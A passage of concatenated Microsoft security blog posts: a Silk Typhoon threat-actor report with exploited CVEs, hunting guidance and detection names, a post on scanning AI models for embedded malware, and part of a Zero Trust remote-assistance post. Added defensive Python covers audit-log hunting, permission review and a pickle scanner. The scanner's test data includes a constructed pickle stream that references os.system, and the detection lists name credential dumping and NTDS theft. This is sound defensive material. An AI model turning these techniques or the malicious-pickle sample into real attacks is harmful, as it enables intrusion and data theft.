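The thresholds are deliberately conservative defaults; in a real tenant the source key should be the egress address plus user agent, since the covert networks described later in this post rotate addresses, and the window should be tuned against the tenant's normal failure rate.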
Silk Typhoon TTPs
Initial access
Silk Typhoon has pursued initial access attacks against targets of interest through development of zero-day exploits or discovering and targeting vulnerable third-party services and software providers. Silk Typhoon has also been observed gaining initial access via compromised credentials. The software or services targeted for initial access focus on IT providers, identity management, privileged access management, and RMM solutions.
In January 2025, Silk Typhoon was also observed exploiting a zero-day vulnerability in the public-facing Ivanti Pulse Connect VPN (CVE-2025-0282). Microsoft Threat Intelligence Center reported the activity to Ivanti, which led to a rapid resolution of the critical exploit, significantly reducing the period during which highly skilled and sophisticated threat actors could leverage it.
Lateral movement to cloud
Once a victim has been successfully compromised, Silk Typhoon is known to utilize common yet effective tactics to move laterally from on-premises environments to cloud environments. Once the threat actor has gained access to an on-premises environment, they look to dump Active Directory, steal passwords within key vaults, and escalate privileges. Furthermore, Silk Typhoon has been observed targeting Microsoft AADConnect servers in these post-compromise activities. AADConnect (now Entra Connect) is a tool that synchronizes on-premises Active Directory with Entra ID (formerly Azure AD). A successful compromise of these servers could allow the actor to escalate privileges, access both on-premises and cloud environments, and move laterally.
Manipulating service principals/applications
While analyzing post-compromise tradecraft, Microsoft identified Silk Typhoon abusing service principals and OAuth applications with administrative permissions to perform email, OneDrive, and SharePoint data exfiltration via MSGraph. Throughout their use of this technique, Silk Typhoon has been observed gaining access to an application that was already consented within the tenant to harvest email data and adding their own passwords to the application. Using this access, the actors can steal email information via the MSGraph API. Silk Typhoon has also been observed compromising multi-tenant applications, potentially allowing the actors to move across tenants, access additional resources within the tenants, and exfiltrate data.
If the compromised application had privileges to interact with the Exchange Web Services (EWS) API, the threat actors were seen compromising email data via EWS.
In some instances, Silk Typhoon was seen creating Entra ID applications in an attempt to facilitate this data theft. The actors would typically name the application in a way to blend into the environment by using legitimate services or Office 365 themes.
Use of covert networks
Silk Typhoon is known to utilize covert networks to obfuscate their malicious activities. Covert networks, tracked by Microsoft as “CovertNetwork”, refer to a collection of egress IPs consisting of compromised or leased devices that may be used by one or more threat actors. Silk Typhoon was observed utilizing a covert network that is comprised of compromised Cyberoam appliances, Zyxel routers, and QNAP devices. The use of covert networks has become a common tactic among various threat actors, particularly Chinese threat actors.
Historical Silk Typhoon zero-day exploitation
Since 2021, Silk Typhoon has been observed targeting and compromising vulnerable unpatched Microsoft Exchange servers, GlobalProtect Gateway on Palo Alto Networks firewalls, Citrix NetScaler appliances, Ivanti Pulse Connect Secure appliances, and others. While not exhaustive, below are historical zero-day vulnerabilities that Silk Typhoon was observed compromising for initial access into victim environments.
GlobalProtect Gateway on Palo Alto Networks Firewalls
In March 2024, Silk Typhoon used a zero-day exploit for CVE-2024-3400 in GlobalProtect Gateway on Palo Alto Networks firewalls to compromise multiple organizations:
- CVE-2024-3400 – A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
In early 2024, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities within Citrix NetScaler ADC and NetScaler Gateways:
- CVE-2023-3519 – An unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway.
In January 2021, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities in Microsoft Exchange Servers. Upon discovery, Microsoft addressed those issues and issued security updates along with related guidance (related links below):
- CVE-2021-26855 – A server-side request forgery (SSRF) vulnerability in Exchange that could allow an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
- CVE-2021-26857 – An insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave Silk Typhoon the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to be exploited.
- CVE-2021-26858 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.
- CVE-2021-27065 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.
During recent activities and historical exploitation of these appliances, Silk Typhoon utilized a variety of web shells to maintain persistence and to allow the actors to remotely access victim environments.
Hunting guidance
To help mitigate and surface various aspects of recent Silk Typhoon activities, Microsoft recommends the following:
- Inspect log activity related to Entra Connect servers for anomalous activity.
- Where these targeted applications have highly privileged accounts, inspect service principals for newly created secrets (credentials).
- Identify and analyze any activity related to newly created applications.
- Identify all multi-tenant applications and scrutinize authentications to them.
- Analyze any observed activity related to use of Microsoft Graph or eDiscovery, particularly for SharePoint or email data exfiltration.
- Look for newly created users on devices impacted by vulnerabilities targeted by Silk Typhoon and investigate virtual private network (VPN) logs for evidence of VPN configuration modifications or sign-in activity during the possible window of compromise of unpatched devices.
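Two of the hunting items above (new secrets on service principals of privileged applications, and newly created applications) can be expressed as a pass over Entra ID audit-log events joined to an application inventory. The code below is an added example for this post, not a Microsoft query or tool. The two activity names, "Add service principal credentials" and "Add application", are the real Entra audit-log `activityDisplayName` values; the flat event shape, the inventory, the approved-initiator list, the high-impact permission set and the 90-day dormancy threshold are simplified assumptions, and every event is constructed.

```python
"""Hunt Entra ID audit events for new service-principal credentials and new
application registrations that merit a closer look. Constructed sample data;
field names other than the two activity names are a simplified assumption.
"""
from datetime import datetime, timedelta

ADD_SP_CREDENTIAL = "Add service principal credentials"   # real Entra audit activityDisplayName
ADD_APPLICATION = "Add application"                       # real Entra audit activityDisplayName

# Words a newly registered app might use to blend in with legitimate Office 365 services
# (the naming pattern described in the post); a heuristic, not an exhaustive list.
LOOKALIKE_TERMS = ("office 365", "o365", "microsoft", "sharepoint", "exchange", "outlook", "onedrive", "teams")
# App-only permissions whose abuse yields tenant-wide mail or file access (assumption; tune per tenant).
HIGH_IMPACT_APP_ONLY = {"Mail.Read", "Mail.ReadWrite", "Files.Read.All", "Sites.Read.All"}


def is_privileged(app: dict) -> bool:
    return bool(set(app.get("app_only_permissions", ())) & HIGH_IMPACT_APP_ONLY)


def looks_like_microsoft_service(display_name: str) -> bool:
    lowered = display_name.lower()
    return any(term in lowered for term in LOOKALIKE_TERMS)


def hunt_app_abuse(events, inventory, approved_initiators, dormant_days=90):
    """Return one finding per event that matches at least one suspicious condition."""
    findings = []
    for ev in events:
        when = datetime.fromisoformat(ev["time"])
        who = ev["initiated_by"]
        reasons = []
        if ev["activity"] == ADD_SP_CREDENTIAL:
            rule = "credential-added"
            app = inventory.get(ev["target_app_id"], {})
            name = app.get("name", ev["target_app_id"])
            if is_privileged(app):
                reasons.append("application holds high-impact app-only permissions")
            last = app.get("last_sign_in")
            if last and when - datetime.fromisoformat(last) > timedelta(days=dormant_days):
                reasons.append(f"application was dormant for more than {dormant_days} days before the credential was added")
            if who not in approved_initiators:
                reasons.append(f"initiator {who} is not an approved application administrator")
        elif ev["activity"] == ADD_APPLICATION:
            rule = "new-application"
            name = ev["target_display_name"]
            if looks_like_microsoft_service(name):
                reasons.append("display name imitates a Microsoft/Office 365 service")
            if who not in approved_initiators:
                reasons.append(f"initiator {who} is not an approved application administrator")
        else:
            continue  # other audit activities are out of scope for this hunt
        if reasons:
            findings.append({"rule": rule, "app": name, "initiator": who, "time": ev["time"], "reasons": reasons})
    return findings


# Constructed inventory: app id -> name, app-only Graph permissions, last service-principal sign-in.
INVENTORY = {
    "app-1111": {"name": "HR Mail Connector", "app_only_permissions": ["Mail.Read"], "last_sign_in": "2024-10-01T00:00:00"},
    "app-2222": {"name": "Intranet Portal", "app_only_permissions": [], "last_sign_in": "2025-02-28T17:00:00"},
}
APPROVED_INITIATORS = {"appadmin@contoso.example"}

# Constructed audit events in a flattened shape.
SAMPLE_EVENTS = [
    {"time": "2025-03-01T08:12:00", "activity": ADD_SP_CREDENTIAL, "initiated_by": "svc-deploy@contoso.example", "target_app_id": "app-1111"},
    {"time": "2025-03-01T09:40:00", "activity": ADD_SP_CREDENTIAL, "initiated_by": "appadmin@contoso.example", "target_app_id": "app-2222"},
    {"time": "2025-03-01T11:05:00", "activity": ADD_APPLICATION, "initiated_by": "jdoe@contoso.example", "target_display_name": "Office 365 Sync Service"},
    {"time": "2025-03-01T12:30:00", "activity": ADD_APPLICATION, "initiated_by": "appadmin@contoso.example", "target_display_name": "Expense Report Bot"},
    {"time": "2025-03-01T13:00:00", "activity": "Update user", "initiated_by": "appadmin@contoso.example"},
]

if __name__ == "__main__":
    for f in hunt_app_abuse(SAMPLE_EVENTS, INVENTORY, APPROVED_INITIATORS):
        print(f"[{f['rule']}] {f['app']} by {f['initiator']} at {f['time']}: " + "; ".join(f["reasons"]))
```

The credential-added rule keys on the service principal's own sign-in history rather than the initiator's, because the post describes attackers adding passwords to an application that was already consented and then signing in as that application; a long-idle app that suddenly gains a secret and starts calling Graph is the pattern to page on.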
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Microsoft Sentinel customers can use the following queries to detect behavior associated with Silk Typhoon:
- Anomalous password reset
- Privileged logon from new ASN
- Anomalous account creation
- Web shell activity
- Potential web shell
- Sign-in password spray
- Smart lockouts
- Credential dumping tools file artifacts
- NTDS theft
- Time series keyvault access anomaly
- Keyvault mass secret retrieval
- Suspicious sign-in by AADConnect account
- New service principal running queries
- SharePoint downloads by IP
- Anomaly of MailItem access by GraphAPI
Customers can use the following query to detect vulnerabilities exploited by Silk Typhoon:
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-0282")
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel
| join kind=inner (
    DeviceTvmSoftwareVulnerabilitiesKB
    | project CveId, CvssScore, IsExploitAvailable, VulnerabilitySeverityLevel, PublishedDate, VulnerabilityDescription, AffectedSoftware
) on CveId
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, CvssScore, IsExploitAvailable, PublishedDate, VulnerabilityDescription, AffectedSoftware
Recommendations
To help detect and mitigate Silk Typhoon’s activity, Microsoft recommends the following:
- Ensure all public facing devices are patched. It’s important to note that patching a vulnerable device does not remediate any post-compromise activities by a threat actor who gained privileged access to a vulnerable device.
- Validate that any Ivanti Pulse Connect VPN appliances are patched to address CVE-2025-0282 and run the Integrity Checker Tool as suggested in Ivanti’s advisory. Consider terminating any active or persistent sessions following patch cycles.
- Defend against legitimate application and service principal abuse by establishing strong controls and monitoring for these security identities. Microsoft recommends the following mitigations to reduce the impact of this threat:
  - Audit the current privilege level of all identities, users, service principals, and Microsoft Graph Data Connect applications (use the Microsoft Graph Data Connect authorization portal) to understand which identities are highly privileged. Scrutinize privileges more closely if they belong to an unknown identity, belong to identities that are no longer in use, or are not fit for purpose. Admins may assign identities privileges over and above what is required. Defenders should pay attention to apps with app-only permissions, as those apps might have over-privileged access. Read additional guidance for investigating compromised and malicious applications.
  - Identify abused OAuth apps using anomaly detection policies. Detect abused OAuth apps that make sensitive Exchange Online administrative activities through App governance. Investigate and remediate any risky OAuth apps.
  - Review any applications that hold EWS.AccessAsUser.All and EWS.full_access_as_app permissions and understand whether they are still required in the tenant. If they are no longer required, they should be removed.
  - If applications must access mailboxes, granular and scalable access can be implemented using role-based access control for applications in Exchange Online. This access model ensures applications are granted access only to the specific mailboxes required.
  - Monitor for service principal sign-ins from unusual locations. Two important reports can provide useful daily activity monitoring:
    - The risky sign-ins report surfaces attempted and successful user access activities where the legitimate owner might not have performed the sign-in.
    - The risky users report surfaces user accounts that might have been compromised, such as a leaked credential that was detected or the user signing in from an unexpected location in the absence of planned travel.
- Defend against credential compromise by building credential hygiene, practicing the principle of least privilege, and reducing credential exposure. Microsoft recommends the following mitigations to reduce the impact of this threat:
  - Implement the Azure Security Benchmark and general best practices for securing identity infrastructure, including:
    - Prevent on-premises service accounts from having direct rights to cloud resources, to prevent lateral movement to the cloud.
    - Ensure that “break glass” account passwords are stored offline and configure honey-token activity for account usage.
    - Implement Conditional Access policies enforcing Microsoft’s Zero Trust principles.
    - Enable risk-based user sign-in protection and automate threat response to block high-risk sign-ins from all locations and enable multifactor authentication (MFA) for medium-risk ones.
    - Ensure that VPN access is protected using modern authentication methods.
  - Identify all multi-tenant applications, assess permissions, and investigate suspicious sign-ins.
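The application-side recommendations above (review EWS permissions, scrutinize app-only permissions, identify multi-tenant apps) amount to a periodic review of the app-registration inventory. The script below is an added example written for this post, not Microsoft's tooling. It assumes a simplified inventory export where each app lists its permission grants as (API, permission, kind) with kind "Application" (app-only) or "Delegated", plus its credentials' validity dates. The two EWS permission names are the ones the post names; the high-impact app-only set and the one-year secret lifetime limit are assumptions to tune per tenant, and the inventory is constructed.

```python
"""Static review of app registrations for the conditions the recommendations call out:
legacy EWS permissions, high-impact app-only permissions, multi-tenant apps, and
long-lived credentials. Inventory shape and contents are constructed for this example.
"""
from datetime import date

LEGACY_EWS = {"EWS.AccessAsUser.All", "EWS.full_access_as_app"}
# App-only permissions that reach every mailbox, site or directory object (assumption; tune per tenant).
HIGH_IMPACT_APP_ONLY = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "Files.Read.All", "Sites.Read.All",
    "Directory.ReadWrite.All", "Application.ReadWrite.All",
}


def review_app_permissions(apps, max_secret_lifetime_days=365):
    """Return (app name, severity, reason) for every condition that needs review."""
    findings = []
    for app in apps:
        name = app["name"]
        for _api, value, kind in app["permissions"]:
            if value in LEGACY_EWS:
                findings.append((name, "high", f"legacy EWS permission {value}: remove it, or move the app to "
                                               "Exchange Online RBAC for Applications scoped to the mailboxes it needs"))
            if kind == "Application" and value in HIGH_IMPACT_APP_ONLY:
                findings.append((name, "high", f"app-only {value} reaches every object in the tenant: confirm it is still required"))
        if app.get("multi_tenant"):
            findings.append((name, "medium", "multi-tenant app: review sign-ins originating from other tenants"))
        for cred in app.get("credentials", ()):
            lifetime = (date.fromisoformat(cred["end"]) - date.fromisoformat(cred["start"])).days
            if lifetime > max_secret_lifetime_days:
                findings.append((name, "medium", f"{cred['kind']} valid for {lifetime} days: rotate it and shorten the lifetime"))
    return findings


# Constructed inventory export (three apps).
SAMPLE_APPS = [
    {"name": "Legacy Mail Archiver", "multi_tenant": False,
     "permissions": [("Office 365 Exchange Online", "EWS.full_access_as_app", "Application")],
     "credentials": [{"kind": "client secret", "start": "2023-01-01", "end": "2099-12-31"}]},
    {"name": "Contoso Intranet", "multi_tenant": True,
     "permissions": [("Microsoft Graph", "User.Read", "Delegated"),
                     ("Microsoft Graph", "Sites.Read.All", "Application")],
     "credentials": [{"kind": "certificate", "start": "2025-01-01", "end": "2025-12-31"}]},
    {"name": "Helpdesk Widget", "multi_tenant": False,
     "permissions": [("Microsoft Graph", "User.Read", "Delegated")], "credentials": []},
]

if __name__ == "__main__":
    for app, severity, reason in review_app_permissions(SAMPLE_APPS):
        print(f"{severity.upper():6} {app}: {reason}")
```

Delegated permissions are deliberately not treated as high impact here: they are bounded by the signed-in user's own access, whereas the app-only grants the post warns about let a stolen application secret read every mailbox or site in the tenant.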
Silk Typhoon is not known to use their own dedicated infrastructure in their operations. Typically, the threat actor uses compromised covert networks, proxies, and VPNs for infrastructure, likely to obfuscate their operations. However, they have also been observed using short-lease virtual private server (VPS) infrastructure to support their operations.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender for Endpoint
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
- Silk Typhoon activity group
The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.
- Possible exploitation of Exchange Server vulnerabilities
- Suspicious web shell detected
- Suspicious Active Directory snapshot dump
- Suspicious credential dump from NTDS.dit
The following Microsoft Defender for Identity alerts can indicate associated threat activity:
- Suspicious Interactive Logon to the Entra Connect Server
- Suspicious writeback by Entra Connect on a sensitive user
- User Password Reset by Entra Connect Account
- Suspicious Entra sync password change
The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.
- Suspicious activities related to Azure Key Vault by a risky user
The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.
- Unusual user accessed a key vault
- Unusual application accessed a key vault
- Access from a suspicious IP to a key vault
- Denied access from a suspicious IP to a key vault
The following Microsoft Defender for Cloud Apps alerts can indicate associated threat activity if app governance is enabled:
- Unusual addition of credentials to an OAuth app
- Suspicious credential added to dormant app
- Unused app newly accessing APIs
- App with suspicious metadata has Exchange permission
- App with an unusual user agent accessed email data through Exchange Web Services
- App with EWS application permissions accessing numerous emails
- App made anomalous Graph calls to Exchange workload post certificate update or addition of new credentials
- Suspicious user created an OAuth app that accessed mailbox items
- Suspicious OAuth app used for collection activities using Graph API
- Risky user updated an app that accessed Email and performed Email activity through Graph API
- Suspicious OAuth app email activity through Graph API
- Suspicious OAuth app email activity through EWS API
Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:
- CVE-2021-26855
- CVE-2021-26857
- CVE-2021-26858
- CVE-2021-27065
Attack Surface Insights with the following titles can indicate vulnerable devices on your network but are not necessarily indicative of exploitation:
- [Potential] CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection Vulnerability
- [Potential] CVE-2023-3519 – Citrix NetScaler ADC and Gateway Unauthenticated
- ProxyLogon – Microsoft Exchange Server Vulnerabilities (Hotfix Available)
Note: An Attack Surface Insight marked as [Potential] indicates a service is running but cannot validate whether that service is running a vulnerable version. Customers should check resources to verify that they are up to date as part of their investigation.
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
- Incident investigation
- Microsoft User analysis
- Threat actor profile
- Threat Intelligence 360 report based on MDTI article (see Threat intelligence reports below)
- Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Defender Threat Intelligence
- Silk Typhoon
- Analyzing attacks taking advantage of the Exchange Server vulnerabilities
- Vulnerability Profile: CVE-2025-0282 – Ivanti Connect Secure, Policy Secure, and ZTA Gateway
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Learn more
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post Silk Typhoon targeting IT supply chain appeared first on Microsoft Security Blog.
Securing generative AI models on Azure AI Foundry
New generative AI models with a broad range of capabilities are emerging every week. In this world of rapid innovation, when choosing the models to integrate into your AI system, it is crucial to make a thoughtful risk assessment that ensures a balance between leveraging new advancements and maintaining robust security. At Microsoft, we are focusing on making our AI development platform a secure and trustworthy place where you can explore and innovate with confidence.
Here we’ll talk about one key part of that: how we secure the models and the runtime environment itself. How do we protect against a bad model compromising your AI system, your larger cloud estate, or even Microsoft’s own infrastructure?
How Microsoft protects data and software in AI systems
But before we set off on that, let me set to rest one very common misconception about how data is used in AI systems. Microsoft does not use customer data to train shared models, nor does it share your logs or content with model providers. Our AI products and platforms are part of our standard product offerings, subject to the same terms and trust boundaries you’ve come to expect from Microsoft, and your model inputs and outputs are considered customer content and handled with the same protection as your documents and email messages. Our AI platform offerings (Azure AI Foundry and Azure OpenAI Service) are 100% hosted by Microsoft on its own servers, with no runtime connections to the model providers. We do offer some features, such as model fine-tuning, that allow you to use your data to create better models for your own use—but these are your models that stay in your tenant.
So, turning to model security: the first thing to remember is that models are just software, running in Azure Virtual Machines (VMs) and accessed through an API; they don’t have any magic powers to break out of that VM, any more than any other software you might run in a VM. Azure is already quite defended against software running in a VM attempting to attack Microsoft’s infrastructure—bad actors try to do that every day, not needing AI for it, and AI Foundry inherits all of those protections. This is a “zero-trust” architecture: Azure services do not assume that things running on Azure are safe!
Now, it is possible to conceal malware inside an AI model. This could pose a danger to you in the same way that malware in any other open- or closed-source software might. To mitigate this risk, for our highest-visibility models we scan and test them before release:
- Malware analysis: Scans AI models for embedded malicious code that could serve as an infection vector and launchpad for malware.
- Vulnerability assessment: Scans for common vulnerabilities and exposures (CVEs) and zero-day vulnerabilities targeting AI models.
- Backdoor detection: Scans model functionality for evidence of supply chain attacks and backdoors such as arbitrary code execution and network calls.
- Model integrity: Analyzes an AI model’s layers, components, and tensors to detect tampering or corruption.
You can identify which models have been scanned by the indication on their model card—no customer action is required to get this benefit. For especially high-visibility models like DeepSeek R1, we go even further and have teams of experts tear apart the software—examining its source code, having red teams probe the system adversarially, and so on—to search for any potential issues before releasing the model. This higher level of scanning doesn’t (yet) have an explicit indicator in the model card, but given its public visibility we wanted to get the scanning done before we had the UI elements ready.
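To make the "malware analysis" and "model integrity" bullets concrete: many model checkpoints (PyTorch's `torch.save` output among them) are built on Python's pickle format, and a pickle stream can name any importable callable, so embedded code shows up as global references to modules a weights file has no reason to touch. The block below is an added example for this post, not Microsoft's scanner; it walks the opcode stream with the standard library's `pickletools` without ever loading the file, then adds a simplified integrity check that hashes each artifact against a sign-off manifest. The module allowlist is an assumption, and all sample bytes are constructed, including a hand-written stream that merely references `os.system` and contains no call.

```python
"""Pre-deployment checks for pickle-based model artifacts: a no-execute opcode
scan for out-of-allowlist global references, and a SHA-256 manifest check.
Constructed samples; the allowlist is an assumption to tighten per model format.
"""
import hashlib
import pickle
import pickletools
from collections import OrderedDict

ALLOWED_ROOTS = {"collections", "torch", "numpy"}  # top-level packages a plain checkpoint may reference
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE", "STRING", "BINSTRING", "SHORT_BINSTRING"}


def scan_pickle(data: bytes, allowed_roots=ALLOWED_ROOTS) -> list:
    """Return 'module.name' for every global reference outside the allowlist.

    GLOBAL carries "module name" inline; STACK_GLOBAL (protocol 4+) takes them from
    the two strings pushed before it, which may come back from the memo, so a small
    memo model is kept. Nothing is executed: pickle.load is never called.
    """
    findings, recent, memo, last = [], [], {}, None
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            op = opcode.name
            if op in STRING_OPS:
                recent.append(arg)
                last = arg
            elif op == "MEMOIZE":
                memo[len(memo)] = last
            elif op in ("PUT", "BINPUT", "LONG_BINPUT"):
                memo[arg] = last
            elif op in ("GET", "BINGET", "LONG_BINGET"):
                last = memo.get(arg)
                if isinstance(last, str):
                    recent.append(last)
            elif op in ("GLOBAL", "STACK_GLOBAL"):
                if op == "GLOBAL":
                    module, name = arg.split(" ", 1)
                elif len(recent) >= 2:
                    module, name = recent[-2], recent[-1]
                else:
                    findings.append("<STACK_GLOBAL without module/name strings>")
                    last = None
                    continue
                last = None
                if module.split(".")[0] not in allowed_roots:
                    findings.append(f"{module}.{name}")
            else:
                last = None
    except Exception as exc:  # truncated or garbled stream is a finding, not a clean result
        findings.append(f"<malformed pickle: {exc}>")
    return findings


def sha256_manifest(artifacts: dict) -> dict:
    """Digest every artifact (file name -> bytes) for the sign-off manifest."""
    return {name: hashlib.sha256(blob).hexdigest() for name, blob in artifacts.items()}


def verify_manifest(artifacts: dict, manifest: dict) -> list:
    """Return names that are missing, altered, or absent from the manifest."""
    actual = sha256_manifest(artifacts)
    bad = {name for name, digest in manifest.items() if actual.get(name) != digest}
    bad |= {name for name in actual if name not in manifest}  # unlisted extra files are also suspicious
    return sorted(bad)


# Constructed samples.
BENIGN_CHECKPOINT = pickle.dumps({"layer.weight": [0.1, 0.2], "layer.bias": [0.0]})
ORDERED_CHECKPOINT = pickle.dumps(OrderedDict([("layer.weight", [0.1, 0.2])]))  # STACK_GLOBAL collections.OrderedDict
# Hand-written protocol-2 stream: PROTO, GLOBAL os.system, BINPUT, STOP. There is no REDUCE,
# so it contains no call; the scanner flags the bare reference.
SUSPICIOUS_CHECKPOINT = b"\x80\x02cos\nsystem\nq\x00."

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN_CHECKPOINT), ("ordered", ORDERED_CHECKPOINT), ("suspicious", SUSPICIOUS_CHECKPOINT)]:
        print(label, scan_pickle(blob) or "clean")
    shards = {"model-00001.bin": b"constructed shard one", "model-00002.bin": b"constructed shard two"}
    manifest = sha256_manifest(shards)
    shards["model-00001.bin"] = b"tampered"
    print("integrity failures:", verify_manifest(shards, manifest))
```

A reference-only stream like the constructed sample would also be caught by a restricted unpickler, but scanning the opcodes first means the decision to reject is made before any deserialization code runs; formats that carry no code at all (safetensors) remove the problem rather than detect it.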
Defending and governing AI models
Of course, as security professionals you presumably realize that no scans can detect all malicious action. This is the same problem an organization faces with any other third-party software, and organizations should address it in the usual manner: trust in that software should come in part from trusted intermediaries like Microsoft, but above all should be rooted in an organization’s own trust (or lack thereof) for its provider.
For those wanting a more secure experience, once you’ve chosen and deployed a model, you can use the full suite of Microsoft’s security products to defend and govern it. You can read more about how to do that here: Securing DeepSeek and other AI systems with Microsoft Security.
And of course, as the quality and behavior of each model is different, you should evaluate any model not just for security, but for whether it fits your specific use case, by testing it as part of your complete system. This is part of the wider approach to how to secure AI systems which we’ll come back to, in depth, in an upcoming blog.
Using Microsoft Security to secure AI models and customer data
In summary, the key points of our approach to securing models on Azure AI Foundry are:
- Microsoft carries out a variety of security investigations for key AI models before hosting them in the Azure AI Foundry Model Catalogue, and continues to monitor for changes that may impact the trustworthiness of each model for our customers. You can use the information on the model card, as well as your trust (or lack thereof) in any given model builder, to assess your position towards any model the way you would for any third-party software library.
- All models hosted on Azure are isolated within the customer tenant boundary. There is no access to or from the model provider, including close partners like OpenAI.
- Customer data is not used to train models, nor is it made available outside of the Azure tenant (unless the customer designs their system to do so).
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
The post Securing generative AI models on Azure AI Foundry appeared first on Microsoft Security Blog.
Rethinking remote assistance security in a Zero Trust world
The recent breach of the United States Treasury underscores a stark reality: cyber adversaries are no longer just looking for gaps in traditional network security—they are actively exploiting the tools organizations rely on for daily operations. Remote assistance technologies, essential for IT support and business continuity, have become prime targets for credential theft, moving within the network, and system exploitation. The message is clear: securing remote assistance is no longer optional; it is a fundamental requirement for maintaining operational resilience.
A multi-pronged approach to securing remote assistance with Zero Trust
For too long, remote assistance security has been presumed rather than intentionally designed into its architecture. The rise in sophisticated cyberthreats demands a fundamental shift in our approach. Organizations must rethink remote assistance security through the lens of Zero Trust, using the three key principles of verify explicitly, use least privilege, and assume breach as a guide and ensuring that every session, user, and device is verified, compliant, and monitored before access is granted.
Discover how implementing Zero Trust can fortify your remote assistance security by visiting our Zero Trust Workshop, where you’ll find an interactive guide to embedding security into your IT operations.
This requires a structured approach with a foundation of:
- Identity and access control—ensuring that only authenticated, compliant users and devices can initiate or receive remote assistance.
- Endpoint security and compliance—enforcing security baselines and conditional access across all managed devices.
- Embedded security in remote assistance—building security into the very foundation of remote assistance tools, eliminating gaps that cyberattackers can exploit.
Identity security is the cornerstone of any secure remote assistance strategy. A compromised identity is often the first step in a cyberattack, making it critical to ensure only verified users and devices can initiate or receive remote assistance sessions. Organizations must enforce:
- Explicit identity verification—using multi-factor authentication (MFA) and risk-based conditional access to ensure only authorized users gain access.
- Least privilege access—ensuring remote assistance is granted only for the necessary duration and with minimal privileges to reduce the risk of exploitation.
- Real-time risk assessment—continuously evaluating access requests for anomalies or suspicious activity to prevent unauthorized access.
By shifting the security perimeter to identity, organizations create an environment where trust is earned dynamically, not assumed.
Closing the gaps with endpoint security and compliance with Microsoft Intune
Cyberattackers frequently exploit outdated, misconfigured, or non-compliant endpoints to gain a foothold in enterprise environments. IT and security leaders must ensure that remote assistance is built on a strong endpoint security foundation, where every device connecting to corporate resources meets strict compliance standards. This highlights the need for organizations to establish consistent security policies across all devices, ensuring they are up to date and compliant before being granted remote access.
Microsoft Intune provides the necessary tools to:
- Enforce compliance policies—restrict remote assistance to managed, up-to-date, and policy-compliant devices.
- Apply security baselines—standardize configurations across endpoints to minimize security gaps.
- Integrate with Microsoft’s security ecosystem—connecting remote assistance workflows with Microsoft Entra, Microsoft Defender product family, and other security tools for real-time monitoring and cyberthreat mitigation.
